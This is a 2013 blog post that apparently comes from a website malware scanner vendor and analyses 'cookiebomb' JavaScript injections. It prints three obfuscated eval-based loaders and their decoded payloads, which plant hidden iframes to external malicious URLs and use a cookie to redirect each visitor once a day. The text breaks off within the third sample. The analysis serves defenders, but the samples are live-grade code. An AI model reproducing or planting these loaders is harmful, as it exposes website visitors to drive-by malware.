Monday, September 23, 2013

8 samples of cookie based web malware


Obfuscated JavaScript code injects hidden malicious iframe into webpage depending on browser's web cookies

Background

Online Website Malware Scanner has detected malicious JavaScript code injection in several website page(s). The decoded payload uses web cookies as a parameter for triggering the malicious redirect of visitor's browser. Cookies are checked on browser and if were not found they are being created. Later they are used to bypass traditional detection methods by applying the malicious action at certain period of time. This technique was described in malwaremustdie blog where author gave, in my opinion, a great name for it - "cookiebomb attack". You can review previous analysis of similar attacks in our other posts describing malware that involves web cookies.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Sample 1 

Beautified script

  1. try {
  2.     + function () {
  3.         if (document.querySelector)--(window[pkiju].getElementById("asd"))
  4.     }()
  5. } catch (lghy) {
  6.     esujkx = function (vhkw) {
  7.         vhkw = "fro" + vhkw;
  8.         for (xbh = 0; xbh < cuvcj.length; xbh++) {
  9.             xdl += String[vhkw](ndh(ljp + (cuvcj[xbh])) - (120));
  10.         }
  11.     };
  12. };
  13. ndh = (window.eval);
  14. ljp = "0x";
  15. ugg = 0;
  16. if (!ugg) {
  17.     try {
  18.         ++ndh(pkiju)["\x62o" + "d" + cuvcj]
  19.     } catch (lghy) {
  20.         qvqzj = "^";
  21.     }
  22.     cuvcj ="98^de^ed^e6^db^ec^e1^e7^e6^98^df^ed^e9^a8^b1^a0^a1^98^f3^85^82^98^ee^d9^ea^98^eb^ec^d9^ec^e1^db^b5^9f^d9^e2^d9^f0^9f^b3^85^82^98^ee^d9^ea^98^db^e7^e6^ec^ea^e7^e4^e4^dd^ea^b5^9f^e1^e6^dc^dd^f0^a6^e8^e0^e8^9f^b3^85^82^98^ee^d9^ea^98^df^ed^e9^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^ea^dd^d9^ec^dd^bd^e4^dd^e5^dd^e6^ec^a0^9f^e1^de^ea^d9^e5^dd^9f^a1^b3^85^82^85^82^98^df^ed^e9^a6^eb^ea^db^98^b5^98^9f^e0^ec^ec^e8^b2^a7^a7^da^ea^eb^db^dd^ea^ec^e1^de^e1^db^d9^ec^e1^e7^e6^a6^e1^ea^a7^e8^ea^e7^e5^e7^aa^a7^c4^e6^ea^b1^aa^af^c9^ee^a6^e8^e0^e8^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e8^e7^eb^e1^ec^e1^e7^e6^98^b5^98^9f^d9^da^eb^e7^e4^ed^ec^dd^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^db^e7^e4^e7^ea^98^b5^98^9f^a9^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e0^dd^e1^df^e0^ec^98^b5^98^9f^a9^e8^f0^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^ef^e1^dc^ec^e0^98^b5^98^9f^a9^e8^f0^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^e4^dd^de^ec^98^b5^98^9f^a9^a8^a8^a8^a9^9f^b3^85^82^98^df^ed^e9^a6^eb^ec^f1^e4^dd^a6^ec^e7^e8^98^b5^98^9f^a9^a8^a8^a8^a9^9f^b3^85^82^85^82^98^e1^de^98^a0^99^dc^e7^db^ed^e5^dd^e6^ec^a6^df^dd^ec^bd^e4^dd^e5^dd^e6^ec^ba^f1^c1^dc^a0^9f^df^ed^e9^9f^a1^a1^98^f3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^ef^ea^e1^ec^dd^a0^9f^b4^e8^98^e1^dc^b5^d4^9f^df^ed^e9^d4^9f^98^db^e4^d9^eb^eb^b5^d4^9f^df^ed^e9^a8^b1^d4^9f^98^b6^b4^a7^e8^b6^9f^a1^b3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^df^dd^ec^bd^e4^dd^e5^dd^e6^ec^ba^f1^c1^dc^a0^9f^df^ed^e9^9f^a1^a6^d9^e8^e8^dd^e6^dc^bb^e0^e1^e4^dc^a0^df^ed^e9^a1^b3^85^82^98^f5^85^82^f5^85^82^de^ed^e6^db^ec^e1^e7^e6^98^cb^dd^ec^bb^e7^e7^e3^e1^dd^a0^db^e7^e7^e3^e1^dd^c6^d9^e5^dd^a4^db^e7^e7^e3^e1^dd^ce^d9^e4^ed^dd^a4^e6^bc^d9^f1^eb^a4^e8^d9^ec^e0^a1^98^f3^85^82^98^ee^d9^ea^98^ec^e7^dc^d9^f1^98^b5^98^e6^dd^ef^98^bc^d9^ec^dd^a0^a1^b3^85^82^98^ee^d9^ea^98^dd^f0^e8^e1^ea^dd^98^b5^98^e6^dd^ef^98^bc^d9^ec^dd^a0^a1^b3^85^82^98^e1^de^98^a0^e6^bc^d9^f1^eb^b5^b5^e6^ed^e4^e4^98^f4^f4^98^e6^bc^d9^f1^eb^b5^b5^a8^a1^98^e6^bc^d9^f1^eb^b5^a9^b3^85^82^98^dd^f0^e8^e1^ea^dd^a6^eb^dd^ec^cc^e1^e5^dd^a0^ec^e7^dc^d9^f1^a6^df^dd^ec^cc^e1^e5^dd^a0^a1^98^a3^98^ab^ae^a8^a8^a8^a8^a8^a2^aa^ac^a2^e6^bc^d9^f1^eb^a1^b3^85^82^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^98^b5^98^db^e7^e7^e3^e1^dd^c6^d9^e5^dd^a3^9a^b5^9a^a3^dd^eb^db^d9^e8^dd^a0^db^e7^e7^e3^e1^dd^ce^d9^e4^ed^dd^a1^85^82^98^a3^98^9a^b3^dd^f0^e8^e1^ea^dd^eb^b5^9a^98^a3^98^dd^f0^e8^e1^ea^dd^a6^ec^e7^bf^c5^cc^cb^ec^ea^e1^e6^df^a0^a1^98^a3^98^a0^a0^e8^d9^ec^e0^a1^98^b7^98^9a^b3^98^e8^d9^ec^e0^b5^9a^98^a3^98^e8^d9^ec^e0^98^b2^98^9a^9a^a1^b3^85^82^f5^85^82^de^ed^e6^db^ec^e1^e7^e6^98^bf^dd^ec^bb^e7^e7^e3^e1^dd^a0^98^e6^d9^e5^dd^98^a1^98^f3^85^82^98^ee^d9^ea^98^eb^ec^d9^ea^ec^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e1^e6^dc^dd^f0^c7^de^a0^98^e6^d9^e5^dd^98^a3^98^9a^b5^9a^98^a1^b3^85^82^98^ee^d9^ea^98^e4^dd^e6^98^b5^98^eb^ec^d9^ea^ec^98^a3^98^e6^d9^e5^dd^a6^e4^dd^e6^df^ec^e0^98^a3^98^a9^b3^85^82^98^e1^de^98^a0^98^a0^98^99^eb^ec^d9^ea^ec^98^a1^98^9e^9e^85^82^98^a0^98^e6^d9^e5^dd^98^99^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^eb^ed^da^eb^ec^ea^e1^e6^df^a0^98^a8^a4^98^e6^d9^e5^dd^a6^e4^dd^e6^df^ec^e0^98^a1^98^a1^98^a1^85^82^98^f3^85^82^98^ea^dd^ec^ed^ea^e6^98^e6^ed^e4^e4^b3^85^82^98^f5^85^82^98^e1^de^98^a0^98^eb^ec^d9^ea^ec^98^b5^b5^98^a5^a9^98^a1^98^ea^dd^ec^ed^ea^e6^98^e6^ed^e4^e4^b3^85^82^98^ee^d9^ea^98^dd^e6^dc^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e1^e6^dc^dd^f0^c7^de^a0^98^9a^b3^9a^a4^98^e4^dd^e6^98^a1^b3^85^82^98^e1^de^98^a0^98^dd^e6^dc^98^b5^b5^98^a5^a9^98^a1^98^dd^e6^dc^98^b5^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^e4^dd^e6^df^ec^e0^b3^85^82^98^ea^dd^ec^ed^ea^e6^98^ed^e6^dd^eb^db^d9^e8^dd^a0^98^dc^e7^db^ed^e5^dd^e6^ec^a6^db^e7^e7^e3^e1^dd^a6^eb^ed^da^eb^ec^ea^e1^e6^df^a0^98^e4^dd^e6^a4^98^dd^e6^dc^98^a1^98^a1^b3^85^82^f5^85^82^e1^de^98^a0^e6^d9^ee^e1^df^d9^ec^e7^ea^a6^db^e7^e7^e3^e1^dd^bd^e6^d9^da^e4^dd^dc^a1^85^82^f3^85^82^e1^de^a0^bf^dd^ec^bb^e7^e7^e3^e1^dd^a0^9f^ee^e1^eb^e1^ec^dd^dc^d7^ed^e9^9f^a1^b5^b5^ad^ad^a1^f3^f5^dd^e4^eb^dd^f3^cb^dd^ec^bb^e7^e7^e3^e1^dd^a0^9f^ee^e1^eb^e1^ec^dd^dc^d7^ed^e9^9f^a4^98^9f^ad^ad^9f^a4^98^9f^a9^9f^a4^98^9f^a7^9f^a1^b3^85^82^85^82^df^ed^e9^a8^b1^a0^a1^b3^85^82^f5^85^82^f5".split(qvqzj);
  23.     xdl = "";
  24.     esujkx("mCharCode");
  25.     ndh("" + xdl);
  26. }

Malicious payload


Decoded payload generates hidden iframe to http://brscertification.ir/promo2/Lnr927Qv.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.


  1. function guq09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var guq = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     guq.src = 'http://brscertification.ir/promo2/Lnr927Qv.php';
  12.  
  13.     guq.style.position = 'absolute';
  14.  
  15.     guq.style.color = '1';
  16.  
  17.     guq.style.height = '1px';
  18.  
  19.     guq.style.width = '1px';
  20.  
  21.     guq.style.left = '10001';
  22.  
  23.     guq.style.top = '10001';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('guq')) {
  28.  
  29.         document.write('<p id=\'guq\' class=\'guq09\' ></p>');
  30.  
  31.         document.getElementById('guq').appendChild(guq);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         guq09();
  89.  
  90.     }
  91.  
  92. }


Sample 2 

Beautified script 

  1. aq = "0" + "x";
  2. bv = (5 - 3 - 1);
  3. sp = "s" + "pli" + "t";
  4. = window;
  5. = "dy";
  6. try {
  7.     ++document.body
  8. } catch (d21vd12v) {
  9.     vzs = false;
  10.     try {} catch (wb) {
  11.         vzs = 21;
  12.     }
  13.     if (!vzs) e = w["eval"];
  14.     if (1) {
  15.         f ="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,65,70,5e,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,65,70,5e,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6d,60,6a,5a,66,63,25,5a,66,64,25,6b,69,26,6e,67,24,5a,66,65,6b,5c,65,6b,26,67,63,6c,5e,60,65,6a,26,5a,6c,6a,6b,66,64,60,71,5c,24,58,5b,64,60,65,26,51,6e,5a,3b,29,4a,6a,3c,25,67,5f,67,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,70,5e,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,70,5e,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,65,70,5e,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,70,5e,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,65,70,5e,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");
  16.     }
  17.     w = f;
  18.     s = [];
  19.     for (= 20 - 20; - i + 1354 != 0; i += 1) {
  20.         j = i;
  21.         if ((0x19 == 031))
  22.             if (e) s += String["fromCharCode"](e(aq + w[j]) + 0xa - bv);
  23.     }
  24.     za = e;
  25.     za(s)
  26. }


Malicious payload

Decoded payload generates hidden iframe to http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function zzzfff() {
  2.  
  3.     var nyg = document.createElement('iframe');
  4.  
  5.  
  6.  
  7.     nyg.src = 'http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php';
  8.  
  9.     nyg.style.position = 'absolute';
  10.  
  11.     nyg.style.border = '0';
  12.  
  13.     nyg.style.height = '1px';
  14.  
  15.     nyg.style.width = '1px';
  16.  
  17.     nyg.style.left = '1px';
  18.  
  19.     nyg.style.top = '1px';
  20.  
  21.  
  22.  
  23.     if (!document.getElementById('nyg')) {
  24.  
  25.         document.write('<div id=\'nyg\'></div>');
  26.  
  27.         document.getElementById('nyg').appendChild(nyg);
  28.  
  29.     }
  30.  
  31. }
  32.  
  33. function SetCookie(cookieName, cookieValue, nDays, path) {
  34.  
  35.     var today = new Date();
  36.  
  37.     var expire = new Date();
  38.  
  39.     if (nDays == null || nDays == 0) nDays = 1;
  40.  
  41.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  42.  
  43.     document.cookie = cookieName + "=" + escape(cookieValue)
  44.  
  45.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  46.  
  47. }
  48.  
  49. function GetCookie(name) {
  50.  
  51.     var start = document.cookie.indexOf(name + "=");
  52.  
  53.     var len = start + name.length + 1;
  54.  
  55.     if ((!start) &&
  56.  
  57.         (name != document.cookie.substring(0, name.length)))
  58.  
  59.     {
  60.  
  61.         return null;
  62.  
  63.     }
  64.  
  65.     if (start == -1) return null;
  66.  
  67.     var end = document.cookie.indexOf(";", len);
  68.  
  69.     if (end == -1) end = document.cookie.length;
  70.  
  71.     return unescape(document.cookie.substring(len, end));
  72.  
  73. }
  74.  
  75. if (navigator.cookieEnabled)
  76.  
  77. {
  78.  
  79.     if (GetCookie('visited_uq') == 55) {} else {
  80.         SetCookie('visited_uq', '55', '1', '/');
  81.  
  82.  
  83.  
  84.         zzzfff();
  85.  
  86.     }
  87.  
  88. }


Sample 3 

Beautified script 

  1. omb = "s" + "p" + "l" + "i" + "t";
  2. rzeyu = window;
  3. vknbp = document;
  4. wokv = "0" + "x";
  5. lvq = (5 - 3 - 1);
  6. try {
  7.     ++(vknbp.body)
  8. } catch (uxrgp) {
  9.     booy = false;
  10.     try {} catch (woxivk) {
  11.         booy = 21;
  12.     }
  13.     if (1) {
  14.         vgdck ="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6f:66:59:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:59:5c:5a:58:6b:6b:60:65:60:67:60:58:65:6b:5c:25:60:6b:26:3e:69:58:5d:60:5a:58:26:5a:63:60:62:25:67:5f:67:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2b:29:28:2a:30:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2b:29:28:2a:30:67:6f:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2b:29:28:2a:30:67:6f:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2b:29:28:2a:30:1e:32:4:1:17:6f:66:59:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2b:29:28:2a:30:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6f:66:59:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6f:66:59:53:1e:17:5a:63:58:6a:6a:34:53:1e:6f:66:59:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6f:66:59:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6f:66:59:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:59:27:30:1f:20:32:4:1:74:4:1:74"[omb](":");
  15.     }
  16.     rzeyu = vgdck;
  17.     gfb = [];
  18.     for (dbml = 22 - 20 - 2; - dbml + 1411 != 0; dbml += 1) {
  19.         tpeh = dbml;
  20.         if ((0x19 == 031)) gfb += String.fromCharCode(eval(wokv + rzeyu[1 * tpeh]) + 0xa - lvq);
  21.     }
  22.     aqfmw = eval;
  23.     aqfmw(gfb)
  24. }


Malicious payload

Decoded payload generates hidden iframe to http://becattinipiante.it/Grafica/clik.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function xob09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var xob = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     xob.src = 'http://becattinipiante.it/Grafica/clik.php';
  12.  
  13.     xob.style.position = 'absolute';
  14.  
  15.     xob.style.color = '42139';
  16.  
  17.     xob.style.height = '42139px';
  18.  
  19.     xob.style.width = '42139px';
  20.  
  21.     xob.style.left = '100042139';
  22.  
  23.     xob.style.top = '100042139';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('xob')) {
  28.  
  29.         document.write('<p id=\'xob\' class=\'xob09\' ></p>');
  30.  
  31.         document.getElementById('xob').appendChild(xob);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
